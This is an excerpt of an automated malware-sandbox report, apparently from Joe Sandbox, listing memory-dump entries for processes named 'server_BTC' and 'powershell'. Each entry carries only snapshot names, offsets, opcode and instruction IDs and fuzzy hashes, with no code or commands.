                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d30c5ae9fd89b716d94ae55c37bf9bec0a1ddabef09dd332362b41e28ee8a803
                                                                                                                    • Instruction ID: af19d581e8bf91ec5cd67cd8dead0aa4a58bdba736fc2dc90e2385e7da07537d
                                                                                                                    • Opcode Fuzzy Hash: d30c5ae9fd89b716d94ae55c37bf9bec0a1ddabef09dd332362b41e28ee8a803
                                                                                                                    • Instruction Fuzzy Hash: 8C61DF74D00219CFCB18EFA4D994AADBBB2FF89304F208569D4197B264DB356D8ACF44
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0891674dcf28f9c6c9b09c1d043ae16b5ea0086bed4eaa00af49919fe4eec1d9
                                                                                                                    • Instruction ID: 180956d4b51b275f30a1a61b73c7cba5367699808cf5c0b216359e58ebd5ee34
                                                                                                                    • Opcode Fuzzy Hash: 0891674dcf28f9c6c9b09c1d043ae16b5ea0086bed4eaa00af49919fe4eec1d9
                                                                                                                    • Instruction Fuzzy Hash: E661B278A00249CFCB44DFA9D5A499DBBF1FF4A310F10906AE916AB365DB31AC05CF14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 97cc8e30dfea4254d81179e5c26312c49aa24d8b4a711dbdf3b274a53345d79e
                                                                                                                    • Instruction ID: 3c4156d01bcf7195f2f9f07eaf7b8c9fd5d968a49b2c6685533915720572b38f
                                                                                                                    • Opcode Fuzzy Hash: 97cc8e30dfea4254d81179e5c26312c49aa24d8b4a711dbdf3b274a53345d79e
                                                                                                                    • Instruction Fuzzy Hash: 8541BCB1D002589FDB14DFAAC988A9EFBF5BF48300F14842AE428AB254D7349946CF94
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 87a9671e820008e409ec77a547ee053880b4ba84b1f5ac757b778c557879fd34
                                                                                                                    • Instruction ID: 1ab9c94ffb0fa451a455d78963f6e4eddd94d13b3a0b01da0662d4d7943e78ab
                                                                                                                    • Opcode Fuzzy Hash: 87a9671e820008e409ec77a547ee053880b4ba84b1f5ac757b778c557879fd34
                                                                                                                    • Instruction Fuzzy Hash: F741BCB0D002589FDB14DFEAC988A9EFFF5BF49300F14842AE429AB254D7349945CF94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Jdq
                                                                                                                    • API String ID: 0-1891755625
                                                                                                                    • Opcode ID: b55093af76f9c270f45c7ddef8eca231c2ffc2efa88f2a4c8aa1596f6acb9e2b
                                                                                                                    • Instruction ID: 87b20d0add6516309a608f31dabc27493fb9b1cd287eeeb9eadd3815653cf341
                                                                                                                    • Opcode Fuzzy Hash: b55093af76f9c270f45c7ddef8eca231c2ffc2efa88f2a4c8aa1596f6acb9e2b
                                                                                                                    • Instruction Fuzzy Hash: 1041E675E002089FDB18DFA9D894AEEBBF2FF88301F108069E515B72A4DB359941CF94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Jdq
                                                                                                                    • API String ID: 0-1891755625
                                                                                                                    • Opcode ID: 7264f93a598fee1d83334b1a6d64a21ffc0c09d13f76fcb5f4601720beef6fbc
                                                                                                                    • Instruction ID: d8aee07fb3804f3c5d6d15695d7dd8c44912f3ff49f40a8c64f2499d7abd40f2
                                                                                                                    • Opcode Fuzzy Hash: 7264f93a598fee1d83334b1a6d64a21ffc0c09d13f76fcb5f4601720beef6fbc
                                                                                                                    • Instruction Fuzzy Hash: 3541F675E002089FCB18DFA9D894AEEBBF2FF88301F108069E515B72A4DB359901CF90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5899ab8d90aecd153e675b6f76a97fe969cec6bd5234856a9c4ebba6d87f40e8
                                                                                                                    • Instruction ID: 978a0418874bf41c418e3ed7a1f8d14d001c20973a4a8ec2078cf6214b85d516
                                                                                                                    • Opcode Fuzzy Hash: 5899ab8d90aecd153e675b6f76a97fe969cec6bd5234856a9c4ebba6d87f40e8
                                                                                                                    • Instruction Fuzzy Hash: 00B29170D0132ADFCB69EF64C898A9DB7B2BB89304F5085E9D40DAB664DB315E81CF44
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f264a98bf09f4eaddea478e0ea74a1b7b1c77ab674247961160304c40f9c04ea
                                                                                                                    • Instruction ID: 7421076422da643a81bbe0452b470427f9a48f0c9afd570a86d2170c3094a341
                                                                                                                    • Opcode Fuzzy Hash: f264a98bf09f4eaddea478e0ea74a1b7b1c77ab674247961160304c40f9c04ea
                                                                                                                    • Instruction Fuzzy Hash: B7B29170E0132ADFCB69EF64C894A9DB7B2BB89304F5085E9D40DAB664DB315E81CF44
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7aeeb2995ffae6cbbe80350934aae3f5206d64e9828862705e1d3d3212501f3a
                                                                                                                    • Instruction ID: 58bedc5444a3fb1371abeda5cb35f22f6105e98c96c8f2a6c996f088579f6c45
                                                                                                                    • Opcode Fuzzy Hash: 7aeeb2995ffae6cbbe80350934aae3f5206d64e9828862705e1d3d3212501f3a
                                                                                                                    • Instruction Fuzzy Hash: EE62BE74A01259CFCB65DF64D894B9DBBB2BF88704F1080E9D41AA7364EB31AE85CF41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ea090a6cad9af0c9d010047dddadc340c1a7480a2e3341fc6ad2ba49f3ea6c5b
                                                                                                                    • Instruction ID: 1e93272dd69ad78fd7df0da5860f3d00dfdeffe1538db341fdea276bfbb7bb6e
                                                                                                                    • Opcode Fuzzy Hash: ea090a6cad9af0c9d010047dddadc340c1a7480a2e3341fc6ad2ba49f3ea6c5b
                                                                                                                    • Instruction Fuzzy Hash: 2162BE74A01269CFCB65DF64D894B9DBBB2BF88704F1080E9D41AA7364DB31AE85CF41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70c0f4ecfc8f2710a45c0e6ddf8b5e75cac7f4f04dae3ecd19afb9cec63a4dd9
                                                                                                                    • Instruction ID: 89ff961a5327befd84906e72235354e7fd553678c6be09f4e946216196ed7fd5
                                                                                                                    • Opcode Fuzzy Hash: 70c0f4ecfc8f2710a45c0e6ddf8b5e75cac7f4f04dae3ecd19afb9cec63a4dd9
                                                                                                                    • Instruction Fuzzy Hash: 7F41CFB1D002889FDB14DFEAD988A9EBFF5BF49300F14846AE454AB250DB349985CF90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0c307a430fbb2772df3da70daf0e0b9e55198b6ccc062f95df38bba4100f9dd8
                                                                                                                    • Instruction ID: ffb1cc7d6c43d3cbe9f32ce332e99d8029e109749ccc322ddd00709cac2392a3
                                                                                                                    • Opcode Fuzzy Hash: 0c307a430fbb2772df3da70daf0e0b9e55198b6ccc062f95df38bba4100f9dd8
                                                                                                                    • Instruction Fuzzy Hash: 05B1DE74E01229CFDB64DF68C994B9DB7F2BB49204F1085EAD40DAB251DB30AE85CF52
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ed22530a43d65a82786da9d1a3f37ee1d3a7ab117342d467b271265fbcbf975
                                                                                                                    • Instruction ID: b0110991dd8d66b6ce9db84e9a56ce1dc3d2c8307288b91cd506144d9f51adcf
                                                                                                                    • Opcode Fuzzy Hash: 1ed22530a43d65a82786da9d1a3f37ee1d3a7ab117342d467b271265fbcbf975
                                                                                                                    • Instruction Fuzzy Hash: 01819F74E10319CFCB58EFA8D894A9DBBB1BF89300F6085A9D419AB765DB30AD41CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dad3c8f25dc7e569dd7af9903f11dba63436a25cdc8a776643df7e5742f9a7cb
                                                                                                                    • Instruction ID: b582a99dd479d6a25d3ce49bbaf1e7c432e2233a23069d18049843691c41d3ad
                                                                                                                    • Opcode Fuzzy Hash: dad3c8f25dc7e569dd7af9903f11dba63436a25cdc8a776643df7e5742f9a7cb
                                                                                                                    • Instruction Fuzzy Hash: 96819074E003199FCB58EFA8D894A9DBBB1BF89300F6085A9D419AB765DB306D41CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4097d8426d32f4ccbbe17c60f7b99592e13bdd5919f048b63b9288685acbff93
                                                                                                                    • Instruction ID: 1c8e8223e6d7d2a1ec451ec933ed028626b724cb6eb2c30fd7903c096e768f01
                                                                                                                    • Opcode Fuzzy Hash: 4097d8426d32f4ccbbe17c60f7b99592e13bdd5919f048b63b9288685acbff93
                                                                                                                    • Instruction Fuzzy Hash: CD41DE78D00309CFDB08DFA9D4986EDBBF1BB59300F10402AE429AB364EB345946CF50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f7036364ec517c3c810debc0f7fd5ed95283afe85c446db8740836e83aff1819
                                                                                                                    • Instruction ID: a27f991da5e56c1511e7395c5c3ec77d4261c873365689a1fc54dd5d78f2a272
                                                                                                                    • Opcode Fuzzy Hash: f7036364ec517c3c810debc0f7fd5ed95283afe85c446db8740836e83aff1819
                                                                                                                    • Instruction Fuzzy Hash: 6341DEB0D002589FDB18DFEAC588A9EFFF5BF48300F14802AE418AB250DB349985CF90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c1991cc2fbf2c5d822b0e055501479e8c09c7ce39e719d1a5e1e03c01d487fbf
                                                                                                                    • Instruction ID: 5d811d37ab6ca2c6f91aa4ee18fb12b1b07bef9783548f378a262cc43cf0b9bd
                                                                                                                    • Opcode Fuzzy Hash: c1991cc2fbf2c5d822b0e055501479e8c09c7ce39e719d1a5e1e03c01d487fbf
                                                                                                                    • Instruction Fuzzy Hash: 2D31F274E002098FCB08DBA4D491AEEB7B2FF89300F109469D415B7790CB36AD41CBA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5d3c61ff2013815412cbd68927096a0388d085753ed8d9456e75e6b5cfaf9871
                                                                                                                    • Instruction ID: 8d2fa31bbebcae4279eaf4bb3cae644c7d528a4aefcbf0c5469a232edea96680
                                                                                                                    • Opcode Fuzzy Hash: 5d3c61ff2013815412cbd68927096a0388d085753ed8d9456e75e6b5cfaf9871
                                                                                                                    • Instruction Fuzzy Hash: B021C074E002098FCB08DBA4D590AEEB7B2FF89300F109469D415B7394CB366D41CB64
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f3405236fa91bc09227274e6768fe642c5be565a136b4a3733902f71ccfb373b
                                                                                                                    • Instruction ID: e5bdf8d05ed0f0c9f5ded7ade3c486d36a353e754a2d2ddec8a1b47259de650f
                                                                                                                    • Opcode Fuzzy Hash: f3405236fa91bc09227274e6768fe642c5be565a136b4a3733902f71ccfb373b
                                                                                                                    • Instruction Fuzzy Hash: 72219A36C152198FE704AFB8D45D7EEBFB0FB01315F0448AAC405A7291DB788688CBA6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fff835114e858010d5de676bf83856cd4eaf786b12922720550065c938e63b88
                                                                                                                    • Instruction ID: 52d66b9024f5b6d58ca904d5c1104b1ecd2cf5d0655cdaa73906498dc925bcaa
                                                                                                                    • Opcode Fuzzy Hash: fff835114e858010d5de676bf83856cd4eaf786b12922720550065c938e63b88
                                                                                                                    • Instruction Fuzzy Hash: E711A1367042049FCB06AB7CD97496D7BB2FF86304B01406AD105DF375DE258C099B92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e86b2503f34ae9e3ac50513e13e882b0f0bbf01d2b6dc4e60b45c9ae2845c96c
                                                                                                                    • Instruction ID: b1b27128b82f8c592e9a6254836a70cdad142e3a8386573d3796c59de29debdd
                                                                                                                    • Opcode Fuzzy Hash: e86b2503f34ae9e3ac50513e13e882b0f0bbf01d2b6dc4e60b45c9ae2845c96c
                                                                                                                    • Instruction Fuzzy Hash: FF01D4353002099FCB05AF6CD57495E7BE6FF85218B004029D106CB364DF31DC049B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fe37a2e3e51afdfde641809eaada2fb863cb2677cde79021df43b1bcee4a62cd
                                                                                                                    • Instruction ID: 2255a1c26d14094f9667d6cea92fc26146221abef80510a3153bb048938fe93a
                                                                                                                    • Opcode Fuzzy Hash: fe37a2e3e51afdfde641809eaada2fb863cb2677cde79021df43b1bcee4a62cd
                                                                                                                    • Instruction Fuzzy Hash: CB015A74C1120ADFDB18EFB8C00D7AEBFF0FB05305F0098AA9416A3281DB784648DBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 310ead044522bd48f322f2411d42a51a1ef0cffcea0eea14d483266f19baa6de
                                                                                                                    • Instruction ID: bec464dc524f4ad2f00aacfe2e2e17ff9c51233e2ea60874b59be5ca26e6c7e2
                                                                                                                    • Opcode Fuzzy Hash: 310ead044522bd48f322f2411d42a51a1ef0cffcea0eea14d483266f19baa6de
                                                                                                                    • Instruction Fuzzy Hash: 63017574B413159FCB68DB34D850BAE7332AF86215F5094A9804D67250CE369E86CF1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 42f824be5a2ce0c1a9e0390b00c11aee5553909d679470ac43d620849b48fd3c
                                                                                                                    • Instruction ID: c6d75d7350f14d6df7b692796624f6bcc59ab4538c3731fb243c94a2c84f71d6
                                                                                                                    • Opcode Fuzzy Hash: 42f824be5a2ce0c1a9e0390b00c11aee5553909d679470ac43d620849b48fd3c
                                                                                                                    • Instruction Fuzzy Hash: B5F0F879D00156CFCB64DFA8D4586ACBBB0EB5A312F0064A6E50AB7260CB309986CF24
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 93b04b145d93f5811c01d1736572adc29c6f428bfd3f500c65a90ad2eb063ce3
                                                                                                                    • Instruction ID: 6254ebc7a5247666fde944b35a5a38e05e73a6ff324f6accc466bba031da7176
                                                                                                                    • Opcode Fuzzy Hash: 93b04b145d93f5811c01d1736572adc29c6f428bfd3f500c65a90ad2eb063ce3
                                                                                                                    • Instruction Fuzzy Hash: 74F0E575911208DFC354EF68E999BD9BFB0FB09321F1041AAD90493361EB309D41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bc77cd8463632732f1e686a772afb1ff4ee1da060c59820d6bff8e5e1b7f861a
                                                                                                                    • Instruction ID: 6d7687e1afea078209465cc30155f94ecac2931a8563b2758e216a67678158e8
                                                                                                                    • Opcode Fuzzy Hash: bc77cd8463632732f1e686a772afb1ff4ee1da060c59820d6bff8e5e1b7f861a
                                                                                                                    • Instruction Fuzzy Hash: C5E02B32402248DFC711DF78DD556DDBFB8EB11302F4081AAD40597652DB355E04DB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 186a075176665dbfaa2f91caf7f5ed552ea6d5b8a586eb35795e01729eb7f820
                                                                                                                    • Instruction ID: c37bda95b5d75695185c825bb953b8ac2a8dbd78a0afcb6524479853c5a44c2e
                                                                                                                    • Opcode Fuzzy Hash: 186a075176665dbfaa2f91caf7f5ed552ea6d5b8a586eb35795e01729eb7f820
                                                                                                                    • Instruction Fuzzy Hash: C1E09AB8910208DFC304EF68E468A58BFB0FB09311F1041AAD80893360EB30AD86CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4afaee984a7c3721e741abafd6a8b7f132c105fa13ad75532460f388709f5ac2
                                                                                                                    • Instruction ID: 4bb2db1089e379a2fd2ca384c1c477be9c1416301007edef3c796c72e2affb20
                                                                                                                    • Opcode Fuzzy Hash: 4afaee984a7c3721e741abafd6a8b7f132c105fa13ad75532460f388709f5ac2
                                                                                                                    • Instruction Fuzzy Hash: 5AE02631901108DFC700EFB8E604A4CBBB8FB00301F508169D40593214DF352E04D790
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8ff855838a9c690d3395758e24b1fbf58f483a2214aef0d61ef5c9e2cd5ef0a4
                                                                                                                    • Instruction ID: 629d010c8a1961ce7f00ffbd1fa5447a4e3cd19beb671d496aa2156ecb0c9369
                                                                                                                    • Opcode Fuzzy Hash: 8ff855838a9c690d3395758e24b1fbf58f483a2214aef0d61ef5c9e2cd5ef0a4
                                                                                                                    • Instruction Fuzzy Hash: A6D0A773C5134A9BD3A4CB58F90A799BF7CF702316F4801A9E51896203EF258081DBE5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 33b6c9a61223e5b846dc704541b08a7a6476f1bac307b2c55de2d50efc0f1ed8
                                                                                                                    • Instruction ID: 344937c5faf2e92f15863bd76b39c8feec4abae68fbffb6c31c719db6604f0c3
                                                                                                                    • Opcode Fuzzy Hash: 33b6c9a61223e5b846dc704541b08a7a6476f1bac307b2c55de2d50efc0f1ed8
                                                                                                                    • Instruction Fuzzy Hash: 05C012708112089BD2149BA9A809B597E6CE70632AF400159A50852241DB715450EAE9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.2180158746.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_15e0000_server_BTC.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6a15a0a66f88c463a0e094c6d16101dcf7b121caa83ae2ab32d880e3317793fc
                                                                                                                    • Instruction ID: aead572aea8f0dafc27b0bd1c53da933d38d8af0c95bebd5e772a7c3524965bb
                                                                                                                    • Opcode Fuzzy Hash: 6a15a0a66f88c463a0e094c6d16101dcf7b121caa83ae2ab32d880e3317793fc
                                                                                                                    • Instruction Fuzzy Hash: F0C08070C1130D9FC324DF98A509B5DBF7CE702312F400169E60853105DF725450D7B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2272472784.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6b50000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3a2eb86e5fe081a611bc9f88561e204e2ae5f7c71c7cea29c6cc07052fb773b
                                                                                                                    • Instruction ID: 28f886610f6a99c477c625ac04a28a6cc1012a66f4294821ce8ce48d2a791784
                                                                                                                    • Opcode Fuzzy Hash: e3a2eb86e5fe081a611bc9f88561e204e2ae5f7c71c7cea29c6cc07052fb773b
